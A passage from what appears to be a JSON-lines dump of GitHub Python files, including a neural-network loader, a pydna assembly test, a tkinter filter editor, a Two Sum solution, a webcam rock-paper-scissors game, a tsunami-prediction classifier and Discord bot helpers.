mnist_vnncomp_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist_convSmallRELU__Point\" in path:\n original_network = mnist_conv_small()\n elif \"mnist_SIGMOID\" in path:\n original_network = mnist_conv_sigmoid_small()\n elif \"mnist_convBigRELU__DiffAI\" in path:\n original_network = mnist_conv_big()\n elif \"mnist_convSuperRELU__DiffAI\" in path:\n original_network = mnist_conv_super()\n elif \"cifar10_convSmallRELU__PGDK\" in path:\n original_network = cifar10_conv_small()\n elif \"cifar_cnn_a\" in path:\n original_network = cifar10_cnn_A()\n elif \"cifar_cnn_b\" in path:\n original_network = cifar10_cnn_B()\n elif \"mnist_cnn_a\" in path:\n original_network = mnist_cnn_A()\n elif \"cifar_base_kw\" in path:\n original_network = cifar10_base()\n elif \"cifar_wide_kw\" in path:\n original_network = cifar10_wide()\n elif \"cifar_deep_kw\" in path:\n original_network = cifar10_deep()\n elif \"cifar10_2_255_simplified\" in path:\n original_network = cifar10_2_255_simplified()\n elif \"cifar10_8_255_simplified\" in path:\n original_network = cifar10_8_255_simplified()\n elif \"cifar10_convBigRELU__PGD\" in path:\n original_network = cifar10_conv_big()\n elif \"resnet_2b2\" in path:\n original_network = resnet2b2(bn=\"bn\" in path)\n elif \"resnet_2b\" in path:\n original_network = resnet2b()\n elif \"resnet_3b2\" in path:\n original_network = resnet3b2(bn=\"bn\" in path)\n elif \"resnet_4b1\" in path:\n original_network = resnet4b1(bn=\"bn\" in path)\n elif \"resnet_4b2\" in path:\n original_network = resnet4b2(bn=\"bn\" in path)\n elif \"resnet_4b\" in path:\n original_network = resnet4b()\n elif \"resnet_9b_bn\" in path:\n original_network = resnet9b(bn=True)\n elif \"ConvMed_tiny\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed_tiny(\"cifar10\", bn=\"bn\" in path)\n elif \"mnist\" in path:\n original_network = ConvMed_tiny(\"mnist\", bn=\"bn\" in path)\n elif \"ConvMedBig\" in path:\n if \"cifar10\" in path:\n original_network = ConvMedBig(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMedBig(\"mnist\")\n elif \"ConvMed2\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed2(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMed2(\"mnist\")\n elif \"ConvMed\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMed(\"mnist\")\n elif \"SP1\" in path:\n #original_network = CNNA(\"fashionmnist\", False, \"cuda\")\n if \"cifar10\" in path:\n original_network = CNN7(\"cuda\", \"cifar10\", input_size=32, input_channel=3, bn=True)\n elif \"mnist\" in path:\n original_network = CNN7(\"cuda\", \"mnist\", input_size=28, input_channel=1, bn=True)\n elif \"tiny\" in path:\n original_network = CNN7(\"cuda\", \"tinyimagenet\", input_size=56, input_channel=3, n_class=200, bn=True)\n elif \"CNN7\" in path:\n if \"no_BN\" in path:\n bn = False\n else:\n bn = True\n if \"cifar10\" in path:\n original_network = CNN7(\"cuda\", \"cifar10\", input_size=32, input_channel=3, bn=bn)\n elif \"mnist\" in path:\n original_network = CNN7(\"cuda\", \"mnist\", input_size=28, input_channel=1, bn=bn)\n elif \"tiny\" in path:\n original_network = CNN7(\"cuda\", \"tinyimagenet\", input_size=56, input_channel=3, n_class=200, bn=bn)\n else:\n raise NotImplementedError(\n \"The network specified in the configuration, could not be loaded.\"\n )\n else:\n raise NotImplementedError(\n \"The network specified in the configuration, could not be loaded.\"\n )\n state_dict = torch.load(path)\n if \"state_dict\" in state_dict.keys():\n state_dict = state_dict[\"state_dict\"]\n original_network.load_state_dict(state_dict)\n original_network = original_network.blocks\n freeze_network(original_network)\n\n return original_network\n\n\ndef load_onnx_model(path: str) -> Tuple[nn.Sequential, Tuple[int, ...], str]:\n onnx_model = load_onnx(path)\n return load_onnx_from_proto(onnx_model, path)\n\n\ndef load_onnx_from_proto(\n onnx_model: onnx.ModelProto, path: Optional[str] = None\n) -> Tuple[nn.Sequential, Tuple[int, ...], str]:\n\n onnx_input_dims = onnx_model.graph.input[-1].type.tensor_type.shape.dim\n inp_name = onnx_model.graph.input[-1].name\n onnx_shape = tuple(d.dim_value for d in onnx_input_dims[1:])\n pytorch_model = ConvertModel(onnx_model)\n\n if path is not None and \"unet\" in path:\n pytorch_structured = pytorch_model.forward_trace_to_graph_unet()\n softmax_idx = [\n i for (i, layer) in enumerate(pytorch_structured) if \"Softmax\" in str(layer)\n ][0]\n pytorch_structured = pytorch_structured[: softmax_idx - 1]\n pytorch_structured.append(nn.Flatten())\n elif len(onnx_shape) == 0 and path is not None and \"vgg16-7\" in path:\n onnx_shape = (3, 224, 224)\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n elif len(onnx_shape) == 0 and path is not None and (\"test_nano\" in path or \"test_tiny\" in path or \"test_small\" in path):\n onnx_shape = (1,)\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n else:\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n\n return pytorch_structured, onnx_shape, inp_name\n\n\n@typing.no_type_check\ndef load_onnx(path: str):\n # The official benchmark repo has all networks with the wrong ending\n if not exists(path) and not path.endswith(\".gz\"):\n path = path + \".gz\"\n if path.endswith(\".gz\"):\n onnx_model = onnx.load(gzip.GzipFile(path))\n else:\n onnx_model = onnx.load(path)\n return onnx_model\n","repo_name":"eth-sri/mn-bab","sub_path":"src/utilities/loading/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":28413,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"14410707354","text":"# based off of\n# http://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html#example-ensemble-plot-forest-importances-py\nimport numpy as np\n\nfrom sklearn.ensemble import ExtraTreesClassifier\n\n# Loads feature data from features file.\ndef load_data():\n data = []\n target = []\n with open('files/feats/test.lsvm', 'r') as f:\n for i, line in enumerate(f.readlines()):\n feats = []\n features = line.split(' ')\n for j, feature in enumerate(features):\n # Ignore features > 192\n if (len(feature.split(':')) == 2 and j < 192):\n feats.append(feature.split(':')[1])\n data.append(feats)\n if i <= 10: # BRK\n target.append(1)\n elif i <= 54: # BRM\n target.append(2)\n elif i <= 941: # GRW\n target.append(3)\n elif i <= 1014: # LRM\n target.append(4)\n elif i <= 1060: # LRR\n target.append(5)\n elif i <= 1063: # MCR\n target.append(6)\n elif i <= 1078: # ROR\n target.append(7)\n elif i <= 1105: # RRM\n target.append(8)\n elif i <= 1163: # RUM\n target.append(9)\n elif i <= 1290: # SQK\n target.append(10)\n elif i <= 1303: # SQL\n target.append(11)\n elif i <= 1348: # TMP\n target.append(12)\n\n return data, target\n\ndef main():\n X, y = load_data()\n # Build a forest and compute the feature importances\n forest = ExtraTreesClassifier(n_estimators=250, compute_importances=True,\n random_state=0)\n \n forest.fit(X, y)\n importances = forest.feature_importances_\n std = np.std([tree.feature_importances_ for tree in forest.estimators_],\n axis=0)\n indices = np.argsort(importances)[::-1]\n # Print the feature ranking\n print(\"Feature ranking:\")\n \n for f in range(len(indices)):\n print(\"%d. feature %d (%f)\" % (f + 1, indices[f],\n importances[indices[f]]))\n\n # Plot the feature importances of the forest\n import pylab as pl\n pl.figure()\n pl.title(\"Feature importances\")\n pl.bar(range(10), importances[indices],\n color=\"r\", yerr=std[indices], align=\"center\")\n pl.xticks(range(10), indices)\n pl.xlim([-1, 10])\n pl.show()\n\n\nif __name__ =='__main__':main()\n","repo_name":"tsakhuja/cs224s-proj","sub_path":"feature-select.py","file_name":"feature-select.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17522937737","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\ntest pGUP1\n'''\n\nimport unittest\n\nclass test_empty(unittest.TestCase):\n\n def test_empty(self):\n ''' test pGUP1'''\n\n import os\n\n cwd = os.getcwd()\n\n os.chdir(\"../docs/cookbook/\")\n \n import pydna\n\n GUP1rec1sens = pydna.read(\"GUP1rec1sens.txt\")\n GUP1rec2AS = pydna.read(\"GUP1rec2AS.txt\")\n GUP1_locus = pydna.read(\"GUP1_locus.gb\")\n pGREG505 = pydna.read(\"pGREG505.gb\")\n \n os.chdir(cwd)\n\n insert = pydna.pcr(GUP1rec1sens, GUP1rec2AS, GUP1_locus)\n\n from Bio.Restriction import SalI\n\n lin_vect, his3 = pGREG505.cut(SalI)\n\n a = pydna.Assembly([insert, lin_vect], limit=28)\n \n pGUP1 = a.circular_products[0]\n \n pGUP1 = pGUP1.synced(pGREG505.seq[:50]) \n \n pGUP1_correct = pydna.read(\"pGUP1_correct.gb\") \n \n self.assertEqual(len(pGUP1_correct), 9981)\n self.assertEqual(len(pGUP1), 9981)\n self.assertTrue( pydna.eq(pGUP1, pGUP1_correct) ) \n self.assertEqual(pGUP1_correct.seguid(), \"42wIByERn2kSe_Exn405RYwhffU\") \n self.assertEqual(pGUP1.seguid(), \"42wIByERn2kSe_Exn405RYwhffU\") \n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n\n\n\n\n\n","repo_name":"bruno2git/pydna","sub_path":"tests/test_assemble_pGUP1.py","file_name":"test_assemble_pGUP1.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"38539506918","text":"# importing module\nfrom pandas import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.filedialog import asksaveasfile\n\nfilter_window = tk.Tk()\nfilter_window.title('Filter')\nfilter_window.geometry(\"400x600\")\nfilter_window.configure(bg='#262c2b')\nfilter_top_frame = tk.Frame(filter_window)\nfilter_top_frame.pack(side=tk.TOP)\nfilter_top_frame.configure(bg='#262c2b')\nfilter_bottom_frame = tk.Frame(filter_window)\nfilter_bottom_frame.pack(side=tk.BOTTOM)\nfilter_bottom_frame.configure(bg='#262c2b')\nmultiplication_filter = []\nband_center = [1, 1.25, 1.6, 2, 2.5, 3.15, 4, 5, 6.3, 8, 10, 12.5, 16, 20, 25, 31.5, 40, 50, 63, 80, 100]\n\n\ndef load_filter_csv():\n temp_filter_name = (tk.filedialog.askopenfile(mode='r', filetypes=[('CSV file', '*.csv')]))\n\n data = read_csv(str(temp_filter_name.name))\n multiplication_filter.append(data['F'])\n\n\nfilter_csv_button = tk.Button(\n filter_top_frame,\n text=\"Load CSV\",\n width=20,\n fg='white', bg='black',\n command=lambda: load_filter_csv(),\n font='Lato 10 bold')\nfilter_csv_button.pack(side=tk.TOP, pady=5, padx=5)\n\nif not multiplication_filter:\n multiplication_filter = [1] * len(band_center)\n\noctave_frame = tk.Frame(filter_top_frame)\noctave_frame.pack(side=tk.TOP, pady=5, padx=5)\noctave_scroll = tk.Scrollbar(octave_frame, orient='vertical')\noctave_scroll.pack(side='right', fill='y')\n\noctave_values = ttk.Treeview(octave_frame, yscrollcommand=octave_scroll.set)\noctave_values.pack()\n\noctave_scroll.config(command=octave_values.yview)\n\n# column definition\noctave_values['columns'] = ('center_band', 'filter_value')\n\noctave_values.column(\"#0\", width=0, stretch=False)\noctave_values.column(\"center_band\", anchor='center', width=120)\noctave_values.column(\"filter_value\", anchor='center', width=120)\n\n# headings\noctave_values.heading(\"#0\", text=\"\", anchor='center')\noctave_values.heading(\"center_band\", text=\"Band Frequency [Hz]\", anchor='center')\noctave_values.heading(\"filter_value\", text=\"Filter value\", anchor='center')\n\nfor i in range(len(multiplication_filter)):\n octave_values.insert(parent='', index='end', iid=i, text='', values=(band_center[i], multiplication_filter[i]))\n\n# labels\ncenter_band = tk.Label(filter_top_frame, text=\"center_band\", width=10)\ncenter_band.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.N)\n\nfilter_value = tk.Label(filter_top_frame, text=\"filter_value\", width=10)\nfilter_value.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.N)\n\n# entry boxes\ncenter_band_entry = tk.Entry(filter_top_frame, width=10)\ncenter_band_entry.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.S)\n\nfilter_value_entry = tk.Entry(filter_top_frame, width=10)\nfilter_value_entry.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.S)\n\n# select record\n\n\ndef select_record():\n # clear entry boxes\n center_band_entry.delete(0, 'end')\n filter_value_entry.delete(0, 'end')\n\n # grab record\n selected = octave_values.focus()\n # grab record values\n record_values = octave_values.item(selected, 'values')\n # temp_label.config(text=selected)\n\n # output to entry boxes\n center_band_entry.insert(0, record_values[0])\n filter_value_entry.insert(0, record_values[1])\n\n\n# save record\ndef update_record():\n selected = octave_values.focus()\n # save new data\n octave_values.item(selected, text=\"\", values=(center_band_entry.get(), filter_value_entry.get()))\n\n # clear entry boxes\n center_band_entry.delete(0, 'end')\n filter_value_entry.delete(0, 'end')\n\n\nselect_button = tk. Button(filter_window, text=\"Select Record\", command=select_record)\nselect_button.pack(pady=10)\n\nedit_button = tk.Button(filter_window, text=\"Edit \", command=update_record)\nedit_button.pack(pady=10)\n\nfilter_info_label = tk.Label(filter_bottom_frame,\n text=\"Filter applied\",\n fg='white', bg='#262c2b',\n font='Lato 8')\nfilter_info_label.pack(side=tk.BOTTOM, anchor=tk.S, pady=5, padx=5)\nfilter_list = [0]*21\n\n# print(filter_list)\n\nfilter_ok_button = tk.Button(\n filter_bottom_frame,\n text=\"OK\",\n width=20,\n fg='white', bg='black',\n command=lambda: get_filter_values() ,\n font='Lato 10 bold')\nfilter_ok_button.pack(side=tk.BOTTOM, pady=5, padx=5)\n\n\ndef get_filter_values():\n for j in range(len(band_center)):\n temp_dict = octave_values.item(j)\n octave_values_list = list(temp_dict.values())\n filter_list[j] = octave_values_list[2][1]\n filter_window.destroy()\n\n\nfilter_window.mainloop()\n","repo_name":"bianekk/filtr-function","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18058914849","text":"# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# You can return the answer in any order.\n\n\n# Example 1:\n\n# Input: nums = [2, 7, 11, 15], target = 9\n# Output: [0, 1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# Example 2:\n\n# Input: nums = [3, 2, 4], target = 6\n# Output: [1, 2]\n# Example 3:\n\n# Input: nums = [3, 3], target = 6\n# Output: [0, 1]\n\n\n\"\"\"\n naive: nested for loop, checking every combination of numbers to see if pair meets target\n O(n^2) time, may time out\n\n optimal: use dictionary\n create an empty dict\n\n enumerate through nums\n check condition if target - num is a key already. if it is:\n return dict[target - num] and current index\n always initialize dict[target] = i\n\n\n\"\"\"\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n #create a dict\n dict = {}\n\n #enumerate through nums\n for i, num in enumerate(nums):\n if target - num in dict:\n return [dict[target - num], i]\n dict[num] = i\n ","repo_name":"hjungj21o/Interview-DS-A","sub_path":"lc_bloomberg.py/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36367399175","text":"import random\r\nimport cv2\r\nimport cvzone\r\nfrom cvzone.HandTrackingModule import HandDetector\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 480)\r\n\r\ntimer = 0\r\nstateResult = False\r\nstartGame = False\r\ndetect = HandDetector(maxHands=1)\r\nscores = [0, 0]\r\nescape=True\r\n\r\nwhile escape==True:\r\n imgBG = cv2.imread(\"resource/BG.png\")\r\n success, img = cap.read()\r\n\r\n imgScaled = cv2.resize(img, (0, 0), None, 0.646, 0.646)\r\n imgScaled = imgScaled[:, 35:375]\r\n\r\n #tofindhands\r\n hands, img = detect.findHands(imgScaled)\r\n if startGame:\r\n\r\n if stateResult is False:\r\n timer = time.time() - initialTime\r\n cv2.putText(imgBG, str(int(timer)), (605, 435), cv2.FONT_HERSHEY_PLAIN, 6, (255, 0, 255), 4)\r\n\r\n if timer > 3:\r\n stateResult = True\r\n timer = 0\r\n if hands:\r\n playerMove=None\r\n hand = hands[0]\r\n fingers = detect.fingersUp(hand)\r\n if fingers == [0, 0, 0, 0, 0]:\r\n playerMove = 1\r\n if fingers == [1, 1, 1, 1, 1]:\r\n playerMove = 2\r\n if fingers == [0, 1, 1, 0, 0]:\r\n playerMove = 3\r\n randomNumber = random.randint(1, 3)\r\n imgAI = cv2.imread(f'resource/{randomNumber}.png', cv2.IMREAD_UNCHANGED)\r\n imgBG=cvzone.overlayPNG(imgBG,imgAI, (217, 389))\r\n # Player Wins\r\n if (playerMove == 1 and randomNumber == 3) or \\\r\n (playerMove == 2 and randomNumber == 1) or \\\r\n (playerMove == 3 and randomNumber == 2):\r\n scores[1] += 1\r\n\r\n # AI Wins\r\n if (playerMove == 3 and randomNumber == 1) or \\\r\n (playerMove == 1 and randomNumber == 2) or \\\r\n (playerMove == 2 and randomNumber == 3):\r\n scores[0] += 1\r\n\r\n imgBG[292:602, 813:1153] = imgScaled\r\n\r\n\r\n if stateResult:\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (217, 389))\r\n\r\n\r\n cv2.putText(imgBG, str(scores[0]), (410, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n cv2.putText(imgBG, str(scores[1]), (1112, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n\r\n cv2.imshow(\"BG\", imgBG)\r\n key=cv2.waitKey(1)\r\n if key == ord('s'):\r\n startGame = True\r\n initialTime = time.time()\r\n stateResult = False\r\n if key == 27:\r\n escape= False\r\n cv2.destroyAllWindows()\r\n","repo_name":"SCCSEAOT/python-projects","sub_path":"Rock Paper Scissor game/Rock Paper Scissors.py","file_name":"Rock Paper Scissors.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"12226715183","text":"\n\"\"\"\nCreated on Fri Dec 8 14:24:47 2017\n\n@author: gautham\n\n\tThis is a machine learning model to predict the occurence of a tsunami with the help of the important\n\tcharacteristics of earthquakes as per International Tsunami Warning Center. The important characteristics\n\tof eathquakes specified for the occurence of tsunami by International Tsunami Warning Centerin the article\n\t\" International Tsunami Warning Center. About Tsunamis. (2013). Accessed 14 January 2013. \" are large,\n\tshallow earthquakes with an epicentre or fault line near or on the ocean floor. These are the main causes\n\tof a tsunami created by an earthquake.\n\n\tThe above characteristics correspond to the following paremeters:\n\t1. Magitude\n\t2. Focal Depth\n\t3. Region of Occurrence such as Land(near ocean floor) or Ocean bed\n\t4. Distance from the ocean bed if the epicenter is in land.\n\nAccuracy achieved so far:\n\nRandom Forest Classifier : 97.99\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.decomposition import PCA\nfrom sklearn.externals import joblib\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\n\n\nfile_name = os.path.dirname(os.path.abspath(__file__)) + \"/model.pkl\"\n\n\ndef plot_graph(df, legend_1, legend_2):\n\tpostives = df.loc[df[\"class\"] == 1]\n\tnegatives = df.loc[df[\"class\"] == 0]\n\tfigure = plt.figure()\n\tplt.xlabel(legend_1[1])\n\tplt.ylabel(legend_2[1])\n\tplt.plot(postives.iloc[:, legend_1[0]], postives.iloc[:, legend_2[0]], 'ro', label=\"Tsunamigenic\")\n\tplt.plot(negatives.iloc[:, legend_1[0]], negatives.iloc[:, legend_2[0]], 'bo', label=\"Non-Tsunamigenic\")\n\tplt.legend(loc=\"best\")\n\tfigure.savefig(legend_1[2] + \"_vs_\" + legend_2[2] + \".svg\", format='svg', dpi=1200)\n\tplt.show()\t\n\n\ndef features_relationship(df, array):\n\tcolors = np.where(df.iloc[:, -1] > 0, 'b', 'r')\n\tlegends = ['magnitude', 'depth', 'region', 'distance']\n\tf, ax_arr = plt.subplots(4,3)\n\tf.canvas.set_window_title('Feature Relationship')\n\tf.subplots_adjust(hspace=0.36, top=1.0, bottom=0.06, wspace=0.22, left=0.05, right=0.95)\n\tx, y = 0, 0\n\tfor i in range(len(legends)):\n\t\ty = 0\n\t\tfor j in range(len(legends)):\n\t\t\tif legends[i] != legends[j]:\n\t\t\t\tax_arr[x, y].set(xlabel=legends[i], ylabel=legends[j])\n\t\t\t\tax_arr[x, y].scatter(df.iloc[:, i], df.iloc[:, j], c=colors)\n\t\t\t\ty += 1\n\t\tx += 1\n\tfigManager = plt.get_current_fig_manager()\n\t#figManager.window.showMaximized()\n\tplt.show()\n\n\ndef dimensional_reduction(features, labels):\n\tpca = PCA(n_components=2)\n\tpca.fit(features)\n\tfirst_component = pca.components_[0]\n\tsecond_component = pca.components_[1]\n\treduced_data = pca.transform(features)\n\tf = plt.figure(figsize=(8, 8))\n\tf.canvas.set_window_title('PCA of Tsunami Dataset')\n\tpos = plt.scatter(reduced_data[labels == 1, 0], reduced_data[labels == 1, 1], color='b', lw=2)\n\tneg = plt.scatter(reduced_data[labels == 0, 0], reduced_data[labels == 0, 1], color='r', lw=2)\n\tplt.legend((pos, neg), ('Tsunami-genic', 'Non Tsunami-genic'))\n\tplt.show()\n\n\ndef target_feature_split(dataset):\n\treturn dataset[:, 0:4], dataset[:, -1]\n\n\ndef split_dataset(X, y):\n\treturn train_test_split(X, y, test_size=0.25, random_state=50)\n\n\ndef train_model(features, labels):\n\tclf = RandomForestClassifier(n_estimators=5, random_state=1)\n\tclf.fit(features, labels)\n\t_ = joblib.dump(clf, file_name)\n\n\ndef test_model(features):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\treturn clf.predict(features)\n\texcept:\n\t\tprint('Please train the model...')\n\ndef get_cv_score(X, y):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\tcv = ShuffleSplit(n_splits=5, test_size=0.30, random_state=50)\n\t\treturn cross_val_score(clf, X, y, cv=cv)\n\texcept:\n\t\tprint('Please train the model...')\n\ndef find_score(pred_values, actual_values):\n\treturn accuracy_score(pred_values, actual_values)\n\n\ndef predict_tsunami(features):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\tpred = clf.predict(features)\n\t\treturn True if pred[0] else False\n\texcept Exception as e:\n\t\tprint('Please train the model...')\n\n\nif __name__ == '__main__':\n\tlabels = ['magnitude', 'focal_depth', 'region', 'distance', 'class']\n\tdf = pd.read_csv(os.path.dirname(os.path.abspath(__file__)) + \"/../dataset/dataset_final_v7.csv\", names=labels)\n\tdataset = df.as_matrix()\n\n\t# View relationship between featuers\n\t#features_relationship(df, dataset)\n\n\t# View individual plot\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [1, \"Focal depth (Km)\", \"depth\"])\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [3, \"Distance from nearest coastal point (Km)\", \"distance\"])\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [2, \"Region of epicenter (Land - 1 / Sea - 0)\", \"region\"])\n\t#plot_graph(df, [1, \"Focal depth (Km)\", \"depth\"], [2, \"Region of epicenter (Land - 1 / Sea - 0)\", \"region\"])\n\t#plot_graph(df, [1, \"Focal depth (Km)\", \"depth\"], [3, \"Distance from nearest coastal point (Km)\", \"distance\"])\n\n\t# Split dataset\n\tX, y = target_feature_split(dataset)\n\tfeatures_train, features_test, labels_train, labels_test = split_dataset(X, y)\n\n\t# Dimensional Reduction\n\t#dimensional_reduction(X, y)\n\n\t# Training the model\n\ttrain_model(features_train, labels_train)\n\n\t# Testing the model\n\tpred = test_model(features_test)\n\n\t# Evaluating the model\n\tscore = find_score(pred, labels_test)\n\n\t# Confusion matrix\n\tprint(confusion_matrix(labels_test, pred, labels=[1,0]))\n\n\t# Classification report\n\tprint(classification_report(labels_test, pred, target_names=['class 0', 'class 1']))\n\n\t# Score\n\tprint('Score : {}'.format(round(score * 100, 2)))\n\n\t# CV Score\n\tcv_score = get_cv_score(X, y)\n\tprint('Score : {} (+/- {})'.format(round(cv_score.mean(), 2), round(cv_score.std(), 2)))\n","repo_name":"gauthampughazhendhi/earthosys-tsunami-alert-system","sub_path":"earthosys_model/model/tsunami_predictor.py","file_name":"tsunami_predictor.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24293549504","text":"from discord.errors import Forbidden\r\nimport discord\r\nimport asyncio\r\nfrom datetime import datetime\r\nimport os.path\r\nimport csv\r\nimport sys\r\nimport re\r\nimport cv2\r\nimport requests\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport io\r\nfrom pprint import pprint\r\nimport struct\r\n\r\n\r\nasync def send_embed(ctx, embed, view=None, delete_after=None):\r\n \"\"\"\r\n Function that handles the sending of embeds\r\n -> Takes context and embed to send\r\n - tries to send embed in channel\r\n - tries to send normal message when that fails\r\n - tries to send embed private with information abot missing permissions\r\n If this all fails: https://youtu.be/dQw4w9WgXcQ\r\n \"\"\"\r\n try:\r\n msg = await ctx.send(embed=embed, view=view, delete_after=delete_after)\r\n return msg\r\n except Forbidden:\r\n send_msg(ctx, view=view, delete_after=delete_after)\r\n\r\n\r\nasync def send_img(ctx, fileArray: np.ndarray, channel=None):\r\n cv2.imwrite('file.png', cv2.cvtColor(fileArray, cv2.COLOR_RGB2BGR))\r\n if channel:\r\n return await channel.send(file=discord.File('file.png'))\r\n else:\r\n return await ctx.send(file=discord.File('file.png'))\r\n\r\n\r\nasync def send_msg(ctx, msg=None, view=None,delete_after=None):\r\n if not msg:\r\n msg = f\"Hey, seems like I can't send any message in {ctx.channel.name} on {ctx.guild.name}\"\r\n try:\r\n msg = await ctx.send(msg, view=view,delete_after=delete_after)\r\n return msg\r\n except Forbidden:\r\n await ctx.author.send(msg)\r\n\r\n\r\nasync def send_cancel_msg(ctx, msg='Operaction canceled'):\r\n await send_msg(ctx, msg=msg)\r\n\r\ndef errorMsg():\r\n exc_type, exc_obj, exc_tb = sys.exc_info()\r\n return \"ERROR: \" + str(exc_type) + \" \" + str(exc_obj) + \" | Line: \" + str(exc_tb.tb_lineno)\r\n\r\n\r\ndef errorEmbed(title):\r\n return discord.Embed(\r\n title=title, color=0xff0000)\r\n\r\n\r\ndef successEmbed(title):\r\n return discord.Embed(\r\n title=title, color=0x00ff00)\r\n\r\n\r\ndef info_embed(title):\r\n return discord.Embed(\r\n title=title, color=discord.Color.blue())\r\n\r\ndef embed_from_dict(title:str,desc:str,data:dict):\r\n embed = discord.Embed(title=title,description=desc,color=discord.Color.blue())\r\n for key,val in data.items():\r\n value = '-'+'\\n-'.join(val) if isinstance(val,(tuple,list)) else val\r\n embed.add_field(name=key,value=value,inline=False)\r\n return embed\r\n\r\ndef removeMatches(theList, toDelete):\r\n newList = []\r\n for item in theList:\r\n if item not in toDelete:\r\n newList.append(item)\r\n return newList\r\n\r\n\r\nasync def clearReactions(msg, embed,timedOut=True):\r\n try:\r\n if timedOut:\r\n embed.set_footer(text=\"Timed Out!\")\r\n await msg.edit(embed=embed)\r\n await msg.clear_reactions()\r\n except:\r\n pass\r\n\r\nasync def elementsInPages(bot, ctx, elementEmbeds):\r\n if len(elementEmbeds) == 1:\r\n await send_embed(ctx, elementEmbeds[0])\r\n return\r\n reactions = {\"⬛\": \"Non-element\", \"🟥\": \"Fire\", \"🟦\": \"Water\",\r\n \"🟩\": \"Wind\", \"🟫\": \"Earth\", \"🟨\": \"Holy\", \"🟪\": \"Dark\",\r\n \"❌\": \"Cancel\"}\r\n elements = {element.title: element for element in elementEmbeds}\r\n msgReactions = {}\r\n for emoji, element in reactions.items():\r\n if element in elements.keys() or emoji == '❌':\r\n msgReactions[emoji] = element\r\n msg = await send_embed(ctx, elementEmbeds[0])\r\n\r\n for reaction in msgReactions.keys():\r\n await msg.add_reaction(reaction)\r\n cache_msg = discord.utils.get(bot.cached_messages, id=msg.id)\r\n emojistr = str(cache_msg.reactions[0])\r\n while True:\r\n try:\r\n reaction, user = await bot.wait_for(\r\n \"reaction_add\",\r\n timeout=25,\r\n check=lambda reaction, user: str(\r\n reaction.emoji) in msgReactions.keys()\r\n and user.id != bot.user.id\r\n and reaction.message.id == msg.id\r\n and user.id == ctx.author.id\r\n )\r\n except asyncio.TimeoutError:\r\n embed = elements[msgReactions[emojistr]]\r\n await clearReactions(msg, embed)\r\n break\r\n else:\r\n previous = emojistr\r\n emojistr = str(reaction.emoji)\r\n pg = msgReactions.get(element)\r\n await reaction.remove(user)\r\n if previous != emojistr:\r\n if emojistr == \"❌\":\r\n await clearReactions(msg, elements[msgReactions[previous]])\r\n break\r\n await msg.edit(embed=elements[msgReactions[emojistr]])\r\n\r\n\r\ndef addToLog(time, author, authorid, server, serverid, content):\r\n headers = [\"Time (UTC)\", \"Author\", \"Author ID\", \"Server\",\r\n \"Server ID\", \"Message content\"]\r\n time = datetime.utcnow().strftime('%Y-%m-%d')\r\n if os.path.isfile(f'logs/{time}.log.csv'):\r\n with open(f'logs/{time}.log.csv', 'a') as log:\r\n writer = csv.writer(log)\r\n writer.writerow(\r\n [datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S'), author, authorid, server, serverid, content])\r\n 